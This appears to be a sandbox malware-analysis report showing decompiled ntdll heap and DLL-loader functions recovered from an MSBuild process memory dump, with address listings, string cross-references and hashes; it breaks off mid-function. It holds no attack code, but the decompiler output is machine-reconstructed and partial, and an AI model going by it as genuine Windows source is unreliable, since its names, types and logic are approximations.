                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0107A0CD
                                            • HEAP[%wZ]: , xrefs: 0107A0AD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                            • API String ID: 0-1340214556
                                            • Opcode ID: a814f54f140e8db4c8319a7a43e7daf9570c17c4a91e6748c85c89cccec30cb9
                                            • Instruction ID: f5cd271a2ec85591ba95988b34b10e70540af95bf9961b475d449ddf9b8cda1a
                                            • Opcode Fuzzy Hash: a814f54f140e8db4c8319a7a43e7daf9570c17c4a91e6748c85c89cccec30cb9
                                            • Instruction Fuzzy Hash: 1881F431700684EFE726DB68C888BAABBF8FF45714F0445A5E5C2CB692D774E940CB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E0102B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                                            				signed int _v8;
                                            				char _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __ebp;
                                            				void* _t72;
                                            				char _t76;
                                            				signed char _t77;
                                            				intOrPtr* _t80;
                                            				unsigned int _t85;
                                            				signed int* _t86;
                                            				signed int _t88;
                                            				signed char _t89;
                                            				intOrPtr _t90;
                                            				intOrPtr _t101;
                                            				intOrPtr* _t111;
                                            				void* _t117;
                                            				intOrPtr* _t118;
                                            				signed int _t120;
                                            				signed char _t121;
                                            				intOrPtr* _t123;
                                            				signed int _t126;
                                            				intOrPtr _t136;
                                            				signed int _t139;
                                            				void* _t140;
                                            				signed int _t141;
                                            				void* _t147;
                                            
                                            				_t111 = _a4;
                                            				_t140 = __ecx;
                                            				_v8 = __edx;
                                            				_t3 = _t111 + 0x18; // 0x0
                                            				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                                            				_t5 = _t111 - 8; // -32
                                            				_t141 = _t5;
                                            				 *(_t111 + 0x14) = _a8;
                                            				_t72 = 4;
                                            				 *(_t141 + 2) = 1;
                                            				 *_t141 = _t72;
                                            				 *((char*)(_t141 + 7)) = 3;
                                            				_t134 =  *((intOrPtr*)(__edx + 0x18));
                                            				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                                            					_t76 = (_t141 - __edx >> 0x10) + 1;
                                            					_v12 = _t76;
                                            					__eflags = _t76 - 0xfe;
                                            					if(_t76 >= 0xfe) {
                                            						_push(__edx);
                                            						_push(0);
                                            						E010CA80D(_t134, 3, _t141, __edx);
                                            						_t76 = _v12;
                                            					}
                                            				} else {
                                            					_t76 = 0;
                                            				}
                                            				 *((char*)(_t141 + 6)) = _t76;
                                            				if( *0x10f8748 >= 1) {
                                            					__eflags = _a12 - _t141;
                                            					if(_a12 <= _t141) {
                                            						goto L4;
                                            					}
                                            					_t101 =  *[fs:0x30];
                                            					__eflags =  *(_t101 + 0xc);
                                            					if( *(_t101 + 0xc) == 0) {
                                            						_push("HEAP: ");
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                                            					E0100B150();
                                            					__eflags =  *0x10f7bc8;
                                            					if(__eflags == 0) {
                                            						E010C2073(_t111, 1, _t140, __eflags);
                                            					}
                                            					goto L3;
                                            				} else {
                                            					L3:
                                            					_t147 = _a12 - _t141;
                                            					L4:
                                            					if(_t147 != 0) {
                                            						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                                            					}
                                            					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                                            						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                                            						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                                            					}
                                            					_t135 =  *(_t111 + 0x14);
                                            					if( *(_t111 + 0x14) == 0) {
                                            						L12:
                                            						_t77 =  *((intOrPtr*)(_t141 + 6));
                                            						if(_t77 != 0) {
                                            							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                                            						} else {
                                            							_t117 = _t140;
                                            						}
                                            						_t118 = _t117 + 0x38;
                                            						_t26 = _t111 + 8; // -16
                                            						_t80 = _t26;
                                            						_t136 =  *_t118;
                                            						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                                            							_push(_t118);
                                            							_push(0);
                                            							E010CA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                                            						} else {
                                            							 *_t80 = _t136;
                                            							 *((intOrPtr*)(_t80 + 4)) = _t118;
                                            							 *((intOrPtr*)(_t136 + 4)) = _t80;
                                            							 *_t118 = _t80;
                                            						}
                                            						_t120 = _v8;
                                            						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                                            						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                                            						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                                            						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                                            						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                                            							__eflags =  *(_t140 + 0xb8);
                                            							if( *(_t140 + 0xb8) == 0) {
                                            								_t88 =  *(_t140 + 0x40) & 0x00000003;
                                            								__eflags = _t88 - 2;
                                            								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                                            								__eflags =  *0x10f8720 & 0x00000001;
                                            								_t89 = _t88 & 0xffffff00 | ( *0x10f8720 & 0x00000001) == 0x00000000;
                                            								__eflags = _t89 & _t121;
                                            								if((_t89 & _t121) != 0) {
                                            									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                                            								}
                                            							}
                                            						}
                                            						_t85 =  *(_t111 + 0x14);
                                            						if(_t85 >= 0x7f000) {
                                            							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                                            						}
                                            						_t86 = _a16;
                                            						 *_t86 = _t141 - _a12 >> 3;
                                            						return _t86;
                                            					} else {
                                            						_t90 = E0102B8E4(_t135);
                                            						_t123 =  *((intOrPtr*)(_t90 + 4));
                                            						if( *_t123 != _t90) {
                                            							_push(_t123);
                                            							_push( *_t123);
                                            							E010CA80D(0, 0xd, _t90, 0);
                                            						} else {
                                            							 *_t111 = _t90;
                                            							 *((intOrPtr*)(_t111 + 4)) = _t123;
                                            							 *_t123 = _t111;
                                            							 *((intOrPtr*)(_t90 + 4)) = _t111;
                                            						}
                                            						_t139 =  *(_t140 + 0xb8);
                                            						if(_t139 != 0) {
                                            							_t93 =  *(_t111 + 0x14) >> 0xc;
                                            							__eflags = _t93;
                                            							while(1) {
                                            								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                                            								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                                            									break;
                                            								}
                                            								_t126 =  *_t139;
                                            								__eflags = _t126;
                                            								if(_t126 != 0) {
                                            									_t139 = _t126;
                                            									continue;
                                            								}
                                            								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                                            								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                                            								break;
                                            							}
                                            							E0102E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                                            						}
                                            						goto L12;
                                            					}
                                            				}
                                            			}






























                                            0x0102b746
                                            0x0102b74b
                                            0x0102b74d
                                            0x0102b750
                                            0x0102b755
                                            0x0102b758
                                            0x0102b758
                                            0x0102b75e
                                            0x0102b763
                                            0x0102b764
                                            0x0102b76a
                                            0x0102b76d
                                            0x0102b771
                                            0x0102b776
                                            0x0102b85c
                                            0x0102b85d
                                            0x0102b860
                                            0x0102b865
                                            0x01072ba1
                                            0x01072ba2
                                            0x01072ba9
                                            0x01072bae
                                            0x01072bae
                                            0x0102b77c
                                            0x0102b77c
                                            0x0102b77c
                                            0x0102b785
                                            0x0102b788
                                            0x01072bb6
                                            0x01072bb9
                                            0x00000000
                                            0x00000000
                                            0x01072bbf
                                            0x01072bc5
                                            0x01072bc9
                                            0x01072be8
                                            0x01072bed
                                            0x01072bcb
                                            0x01072be0
                                            0x01072be5
                                            0x01072bf3
                                            0x01072bf8
                                            0x01072bfd
                                            0x01072c05
                                            0x01072c0e
                                            0x01072c0e
                                            0x00000000
                                            0x0102b78e
                                            0x0102b78e
                                            0x0102b78e
                                            0x0102b791
                                            0x0102b791
                                            0x0102b797
                                            0x0102b797
                                            0x0102b79f
                                            0x0102b7a9
                                            0x0102b7af
                                            0x0102b7af
                                            0x0102b7b1
                                            0x0102b7b6
                                            0x0102b7e2
                                            0x0102b7e2
                                            0x0102b7e7
                                            0x0102b880
                                            0x0102b7ed
                                            0x0102b7ed
                                            0x0102b7ed
                                            0x0102b7ef
                                            0x0102b7f2
                                            0x0102b7f2
                                            0x0102b7f5
                                            0x0102b7fa
                                            0x01072c2d
                                            0x01072c2e
                                            0x01072c39
                                            0x0102b800
                                            0x0102b800
                                            0x0102b802
                                            0x0102b805
                                            0x0102b808
                                            0x0102b808
                                            0x0102b80a
                                            0x0102b80d
                                            0x0102b816
                                            0x0102b81c
                                            0x0102b822
                                            0x0102b82f
                                            0x0102b88b
                                            0x0102b892
                                            0x0102b897
                                            0x0102b899
                                            0x0102b89b
                                            0x0102b89e
                                            0x0102b8a5
                                            0x0102b8a8
                                            0x0102b8aa
                                            0x0102b8ac
                                            0x0102b8ac
                                            0x0102b8aa
                                            0x0102b892
                                            0x0102b831
                                            0x0102b839
                                            0x0102b83b
                                            0x0102b83b
                                            0x0102b844
                                            0x0102b84b
                                            0x0102b852
                                            0x0102b7b8
                                            0x0102b7ba
                                            0x0102b7bf
                                            0x0102b7c4
                                            0x01072c18
                                            0x01072c19
                                            0x01072c23
                                            0x0102b7ca
                                            0x0102b7ca
                                            0x0102b7cc
                                            0x0102b7cf
                                            0x0102b7d1
                                            0x0102b7d1
                                            0x0102b7d4
                                            0x0102b7dc
                                            0x0102b8bb
                                            0x0102b8bb
                                            0x0102b8be
                                            0x0102b8be
                                            0x0102b8c1
                                            0x00000000
                                            0x00000000
                                            0x0102b8c3
                                            0x0102b8c5
                                            0x0102b8c7
                                            0x0102b8e0
                                            0x00000000
                                            0x0102b8e0
                                            0x0102b8cc
                                            0x0102b8cc
                                            0x00000000
                                            0x0102b8cc
                                            0x0102b8d6
                                            0x0102b8d6
                                            0x00000000
                                            0x0102b7dc
                                            0x0102b7b6

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-1334570610
                                            • Opcode ID: fefa884bd0ec67aa64245f457a7ce36b3748d07e79ba58268379137a96958176
                                            • Instruction ID: 5637b52f5550680a98f288efce737a2c8fc29ea6627f29d11f1a4975362fbb83
                                            • Opcode Fuzzy Hash: fefa884bd0ec67aa64245f457a7ce36b3748d07e79ba58268379137a96958176
                                            • Instruction Fuzzy Hash: 8B61D270600255DFDB69CF28C485BAABBE1FF44704F1885AEE8898F242D770E891CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E01017E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				char _v24;
                                            				signed int _t73;
                                            				void* _t77;
                                            				char* _t82;
                                            				char* _t87;
                                            				signed char* _t97;
                                            				signed char _t102;
                                            				intOrPtr _t107;
                                            				signed char* _t108;
                                            				intOrPtr _t112;
                                            				intOrPtr _t124;
                                            				intOrPtr _t125;
                                            				intOrPtr _t126;
                                            
                                            				_t107 = __edx;
                                            				_v12 = __ecx;
                                            				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                            				_t124 = 0;
                                            				_v20 = __edx;
                                            				if(E0101CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                            					_t112 = _v8;
                                            				} else {
                                            					_t112 = 0;
                                            					_v8 = 0;
                                            				}
                                            				if(_t112 != 0) {
                                            					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                            						_t124 = 0xc000007b;
                                            						goto L8;
                                            					}
                                            					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                            					 *(_t125 + 0x34) = _t73;
                                            					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                            						goto L3;
                                            					}
                                            					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                            					_t124 = E0100C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                            					if(_t124 < 0) {
                                            						goto L8;
                                            					} else {
                                            						goto L3;
                                            					}
                                            				} else {
                                            					L3:
                                            					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                            						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                            						L8:
                                            						return _t124;
                                            					}
                                            					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                            						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                            							goto L5;
                                            						}
                                            						_t102 =  *0x10f5780; // 0x0
                                            						if((_t102 & 0x00000003) != 0) {
                                            							E01085510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                            							_t102 =  *0x10f5780; // 0x0
                                            						}
                                            						if((_t102 & 0x00000010) != 0) {
                                            							asm("int3");
                                            						}
                                            						_t124 = 0xc0000428;
                                            						goto L8;
                                            					}
                                            					L5:
                                            					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                            						goto L8;
                                            					}
                                            					_t77 = _a4 - 0x40000003;
                                            					if(_t77 == 0 || _t77 == 0x33) {
                                            						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                            						if(E01027D50() != 0) {
                                            							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            						} else {
                                            							_t82 = 0x7ffe0384;
                                            						}
                                            						_t108 = 0x7ffe0385;
                                            						if( *_t82 != 0) {
                                            							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                            								if(E01027D50() == 0) {
                                            									_t97 = 0x7ffe0385;
                                            								} else {
                                            									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            								}
                                            								if(( *_t97 & 0x00000020) != 0) {
                                            									E01087016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                            								}
                                            							}
                                            						}
                                            						if(_a4 != 0x40000003) {
                                            							L14:
                                            							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                            							if(E01027D50() != 0) {
                                            								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            							} else {
                                            								_t87 = 0x7ffe0384;
                                            							}
                                            							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                            								if(E01027D50() != 0) {
                                            									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            								}
                                            								if(( *_t108 & 0x00000020) != 0) {
                                            									E01087016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                            								}
                                            							}
                                            							goto L8;
                                            						} else {
                                            							_v16 = _t125 + 0x24;
                                            							_t124 = E0103A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                            							if(_t124 < 0) {
                                            								E0100B1E1(_t124, 0x1490, 0, _v16);
                                            								goto L8;
                                            							}
                                            							goto L14;
                                            						}
                                            					} else {
                                            						goto L8;
                                            					}
                                            				}
                                            			}




















                                            0x01017e4c
                                            0x01017e50
                                            0x01017e55
                                            0x01017e58
                                            0x01017e5d
                                            0x01017e71
                                            0x01017f33
                                            0x01017e77
                                            0x01017e77
                                            0x01017e79
                                            0x01017e79
                                            0x01017e7e
                                            0x01017f45
                                            0x01069848
                                            0x00000000
                                            0x01069848
                                            0x01017f4e
                                            0x01017f53
                                            0x01017f5a
                                            0x00000000
                                            0x00000000
                                            0x0106985a
                                            0x01069862
                                            0x01069866
                                            0x00000000
                                            0x0106986c
                                            0x00000000
                                            0x0106986c
                                            0x01017e84
                                            0x01017e84
                                            0x01017e8d
                                            0x01069871
                                            0x01017eb8
                                            0x01017ec0
                                            0x01017ec0
                                            0x01017e9a
                                            0x0106987e
                                            0x00000000
                                            0x00000000
                                            0x01069884
                                            0x0106988b
                                            0x010698a7
                                            0x010698ac
                                            0x010698b1
                                            0x010698b6
                                            0x010698b8
                                            0x010698b8
                                            0x010698b9
                                            0x00000000
                                            0x010698b9
                                            0x01017ea0
                                            0x01017ea7
                                            0x00000000
                                            0x00000000
                                            0x01017eac
                                            0x01017eb1
                                            0x01017ec6
                                            0x01017ed0
                                            0x010698cc
                                            0x01017ed6
                                            0x01017ed6
                                            0x01017ed6
                                            0x01017ede
                                            0x01017ee3
                                            0x010698e3
                                            0x010698f0
                                            0x01069902
                                            0x010698f2
                                            0x010698fb
                                            0x010698fb
                                            0x01069907
                                            0x0106991d
                                            0x0106991d
                                            0x01069907
                                            0x010698e3
                                            0x01017ef0
                                            0x01017f14
                                            0x01017f14
                                            0x01017f1e
                                            0x01069946
                                            0x01017f24
                                            0x01017f24
                                            0x01017f24
                                            0x01017f2c
                                            0x0106996a
                                            0x01069975
                                            0x01069975
                                            0x0106997e
                                            0x01069993
                                            0x01069993
                                            0x0106997e
                                            0x00000000
                                            0x01017ef2
                                            0x01017efc
                                            0x01017f0a
                                            0x01017f0e
                                            0x01069933
                                            0x00000000
                                            0x01069933
                                            0x00000000
                                            0x01017f0e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01017eb1

                                            Strings
                                            • LdrpCompleteMapModule, xrefs: 01069898
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 01069891
                                            • minkernel\ntdll\ldrmap.c, xrefs: 010698A2
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            • Opcode ID: 5f3800086f1b6c057f0eb229e6faa86c042f22584e816c2d891f1d79d2d6571d
                                            • Instruction ID: 2a650e823e0e9b06a8a64225504c136ebd022369cc7fbcb4e2de385e867c450a
                                            • Opcode Fuzzy Hash: 5f3800086f1b6c057f0eb229e6faa86c042f22584e816c2d891f1d79d2d6571d
                                            • Instruction Fuzzy Hash: 8551F231A04746DFEB22CB6CC944B6A7BE8BB08314F540599E9D19BBD5D738ED00CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 64%
                                            			E010B23E3(signed int __ecx, unsigned int __edx) {
                                            				intOrPtr _v8;
                                            				intOrPtr _t42;
                                            				char _t43;
                                            				signed short _t44;
                                            				signed short _t48;
                                            				signed char _t51;
                                            				signed short _t52;
                                            				intOrPtr _t54;
                                            				signed short _t64;
                                            				signed short _t66;
                                            				intOrPtr _t69;
                                            				signed short _t73;
                                            				signed short _t76;
                                            				signed short _t77;
                                            				signed short _t79;
                                            				void* _t83;
                                            				signed int _t84;
                                            				signed int _t85;
                                            				signed char _t94;
                                            				unsigned int _t99;
                                            				unsigned int _t104;
                                            				signed int _t108;
                                            				void* _t110;
                                            				void* _t111;
                                            				unsigned int _t114;
                                            
                                            				_t84 = __ecx;
                                            				_push(__ecx);
                                            				_t114 = __edx;
                                            				_t42 =  *((intOrPtr*)(__edx + 7));
                                            				if(_t42 == 1) {
                                            					L49:
                                            					_t43 = 1;
                                            					L50:
                                            					return _t43;
                                            				}
                                            				if(_t42 != 4) {
                                            					if(_t42 >= 0) {
                                            						if( *(__ecx + 0x4c) == 0) {
                                            							_t44 =  *__edx & 0x0000ffff;
                                            						} else {
                                            							_t73 =  *__edx;
                                            							if(( *(__ecx + 0x4c) & _t73) != 0) {
                                            								_t73 = _t73 ^  *(__ecx + 0x50);
                                            							}
                                            							_t44 = _t73 & 0x0000ffff;
                                            						}
                                            					} else {
                                            						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x10f874c ^ __ecx;
                                            						if(_t104 == 0) {
                                            							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                                            						} else {
                                            							_t76 = 0;
                                            						}
                                            						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                                            					}
                                            					_t94 =  *((intOrPtr*)(_t114 + 7));
                                            					_t108 = _t44 & 0xffff;
                                            					if(_t94 != 5) {
                                            						if((_t94 & 0x00000040) == 0) {
                                            							if((_t94 & 0x0000003f) == 0x3f) {
                                            								if(_t94 >= 0) {
                                            									if( *(_t84 + 0x4c) == 0) {
                                            										_t48 =  *_t114 & 0x0000ffff;
                                            									} else {
                                            										_t66 =  *_t114;
                                            										if(( *(_t84 + 0x4c) & _t66) != 0) {
                                            											_t66 = _t66 ^  *(_t84 + 0x50);
                                            										}
                                            										_t48 = _t66 & 0x0000ffff;
                                            									}
                                            								} else {
                                            									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x10f874c ^ _t84;
                                            									if(_t99 == 0) {
                                            										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                                            									} else {
                                            										_t69 = 0;
                                            									}
                                            									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                                            								}
                                            								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                                            							} else {
                                            								_t85 = _t94 & 0x3f;
                                            							}
                                            						} else {
                                            							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                                            						}
                                            					} else {
                                            						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                                            					}
                                            					_t110 = (_t108 << 3) - _t85;
                                            				} else {
                                            					if( *(__ecx + 0x4c) == 0) {
                                            						_t77 =  *__edx & 0x0000ffff;
                                            					} else {
                                            						_t79 =  *__edx;
                                            						if(( *(__ecx + 0x4c) & _t79) != 0) {
                                            							_t79 = _t79 ^  *(__ecx + 0x50);
                                            						}
                                            						_t77 = _t79 & 0x0000ffff;
                                            					}
                                            					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                                            				}
                                            				_t51 =  *((intOrPtr*)(_t114 + 7));
                                            				if(_t51 != 5) {
                                            					if((_t51 & 0x00000040) == 0) {
                                            						_t52 = 0;
                                            						goto L42;
                                            					}
                                            					_t64 = _t51 & 0x3f;
                                            					goto L38;
                                            				} else {
                                            					_t64 =  *(_t114 + 6) & 0x000000ff;
                                            					L38:
                                            					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                                            					L42:
                                            					_t35 = _t114 + 8; // -16
                                            					_t111 = _t110 + (_t52 & 0x0000ffff);
                                            					_t83 = _t35 + _t111;
                                            					_t54 = E0105D4F0(_t83, 0xfe6c58, 8);
                                            					_v8 = _t54;
                                            					if(_t54 == 8) {
                                            						goto L49;
                                            					}
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push("HEAP: ");
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push(_t111);
                                            					_push(_v8 + _t83);
                                            					E0100B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                            						 *0x10f6378 = 1;
                                            						asm("int3");
                                            						 *0x10f6378 = 0;
                                            					}
                                            					_t43 = 0;
                                            					goto L50;
                                            				}
                                            			}




























                                            0x010b23e3
                                            0x010b23e8
                                            0x010b23eb
                                            0x010b23ee
                                            0x010b23f3
                                            0x010b259b
                                            0x010b259b
                                            0x010b259d
                                            0x010b25a3
                                            0x010b25a3
                                            0x010b23fb
                                            0x010b2424
                                            0x010b244f
                                            0x010b2460
                                            0x010b2451
                                            0x010b2451
                                            0x010b2456
                                            0x010b2458
                                            0x010b2458
                                            0x010b245b
                                            0x010b245b
                                            0x010b2426
                                            0x010b2431
                                            0x010b2436
                                            0x010b2443
                                            0x010b2438
                                            0x010b2438
                                            0x010b2438
                                            0x010b2445
                                            0x010b2445
                                            0x010b2463
                                            0x010b2469
                                            0x010b246f
                                            0x010b2480
                                            0x010b2495
                                            0x010b24a1
                                            0x010b24ce
                                            0x010b24df
                                            0x010b24d0
                                            0x010b24d0
                                            0x010b24d5
                                            0x010b24d7
                                            0x010b24d7
                                            0x010b24da
                                            0x010b24da
                                            0x010b24a3
                                            0x010b24b0
                                            0x010b24b5
                                            0x010b24c2
                                            0x010b24b7
                                            0x010b24b7
                                            0x010b24b7
                                            0x010b24c4
                                            0x010b24c4
                                            0x010b24e8
                                            0x010b2497
                                            0x010b249a
                                            0x010b249a
                                            0x010b2482
                                            0x010b2488
                                            0x010b2488
                                            0x010b2471
                                            0x010b2479
                                            0x010b2479
                                            0x010b24ef
                                            0x010b23fd
                                            0x010b2401
                                            0x010b2412
                                            0x010b2403
                                            0x010b2403
                                            0x010b2408
                                            0x010b240a
                                            0x010b240a
                                            0x010b240d
                                            0x010b240d
                                            0x010b241b
                                            0x010b241b
                                            0x010b24f1
                                            0x010b24f6
                                            0x010b2507
                                            0x010b2510
                                            0x00000000
                                            0x010b2510
                                            0x010b250b
                                            0x00000000
                                            0x010b24f8
                                            0x010b24f8
                                            0x010b24fc
                                            0x010b2500
                                            0x010b2512
                                            0x010b2515
                                            0x010b251a
                                            0x010b2521
                                            0x010b2524
                                            0x010b2529
                                            0x010b252f
                                            0x00000000
                                            0x00000000
                                            0x010b253c
                                            0x010b255c
                                            0x010b2561
                                            0x010b253e
                                            0x010b2554
                                            0x010b2559
                                            0x010b256a
                                            0x010b256d
                                            0x010b2574
                                            0x010b2586
                                            0x010b2588
                                            0x010b258f
                                            0x010b2590
                                            0x010b2590
                                            0x010b2597
                                            0x00000000
                                            0x010b2597

                                            Strings
                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 010B256F
                                            • HEAP: , xrefs: 010B255C
                                            • HEAP[%wZ]: , xrefs: 010B254F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                            • API String ID: 0-3815128232
                                            • Opcode ID: 1b9051d4bbcc7f3513f2f1e6cb14c65d4a836f03fa253a2bd5068d9029c4bdac
                                            • Instruction ID: 37e5a840e75ae3818b2b501d78aa5f8afc49914dd3573c8b140727a6880a948a
                                            • Opcode Fuzzy Hash: 1b9051d4bbcc7f3513f2f1e6cb14c65d4a836f03fa253a2bd5068d9029c4bdac
                                            • Instruction Fuzzy Hash: 4E511634100250CAE3B5DE1EC8C47F67BF1EB48645F554899E9C28BA85DB3EF846DB21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0100E620(void* __ecx, short* __edx, short* _a4) {
                                            				char _v16;
                                            				char _v20;
                                            				intOrPtr _v24;
                                            				char* _v28;
                                            				char _v32;
                                            				char _v36;
                                            				char _v44;
                                            				signed int _v48;
                                            				intOrPtr _v52;
                                            				void* _v56;
                                            				void* _v60;
                                            				char _v64;
                                            				void* _v68;
                                            				void* _v76;
                                            				void* _v84;
                                            				signed int _t59;
                                            				signed int _t74;
                                            				signed short* _t75;
                                            				signed int _t76;
                                            				signed short* _t78;
                                            				signed int _t83;
                                            				short* _t93;
                                            				signed short* _t94;
                                            				short* _t96;
                                            				void* _t97;
                                            				signed int _t99;
                                            				void* _t101;
                                            				void* _t102;
                                            
                                            				_t80 = __ecx;
                                            				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                            				_t96 = __edx;
                                            				_v44 = __edx;
                                            				_t78 = 0;
                                            				_v56 = 0;
                                            				if(__ecx == 0 || __edx == 0) {
                                            					L28:
                                            					_t97 = 0xc000000d;
                                            				} else {
                                            					_t93 = _a4;
                                            					if(_t93 == 0) {
                                            						goto L28;
                                            					}
                                            					_t78 = E0100F358(__ecx, 0xac);
                                            					if(_t78 == 0) {
                                            						_t97 = 0xc0000017;
                                            						L6:
